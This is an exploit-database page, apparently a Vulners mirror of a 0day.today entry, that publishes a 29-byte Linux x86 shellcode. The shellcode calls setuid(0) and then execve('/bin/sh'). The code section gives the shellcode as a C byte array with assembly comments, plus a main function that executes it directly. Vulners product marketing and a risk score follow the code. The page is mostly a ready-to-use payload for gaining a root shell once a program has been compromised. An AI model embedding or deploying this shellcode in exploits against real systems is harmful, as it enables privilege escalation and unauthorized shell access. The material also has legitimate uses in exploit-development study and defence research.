Lucene search
K

linux/x86 setuid(0) + execve("/bin/sh",...) Shellcode 29 bytes

🗓️ 23 Apr 2010 00:00:00Reported by Marcin UlikowskiType 
zdt
 zdt
🔗 0day.today👁 32 Views

29 byte shellcode for linux/x86 to execute shell with setuid(0) privilege escalation.

Code
==============================================================
linux/x86 setuid(0) + execve("/bin/sh",...) Shellcode 29 bytes
==============================================================

/* 29 byte-long setuid(0) + execve("/bin/sh",...) shellcode
   by Marcin Ulikowski <[email protected]> */
 
#include <unistd.h>
 
char shellcode[] =
"\x31\xdb"             /* xor    %ebx,%ebx       */
"\x8d\x43\x17"         /* lea    0x17(%ebx),%eax */
"\xcd\x80"             /* int    $0x80           */
"\x53"                 /* push   %ebx            */
"\x68\x6e\x2f\x73\x68" /* push   $0x68732f6e     */
"\x68\x2f\x2f\x62\x69" /* push   $0x69622f2f     */
"\x89\xe3"             /* mov    %esp,%ebx       */
"\x50"                 /* push   %eax            */
"\x53"                 /* push   %ebx            */
"\x89\xe1"             /* mov    %esp,%ecx       */
"\x99"                 /* cltd                   */
"\xb0\x0b"             /* mov    $0xb,%al        */
"\xcd\x80";            /* int    $0x80           */
 
int main(void) {
  void(*f)()=(void*)shellcode;f();
  return 0;
}



#  0day.today [2018-04-03]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Apr 2010 00:00Current
7High risk
Vulners AI Score7
32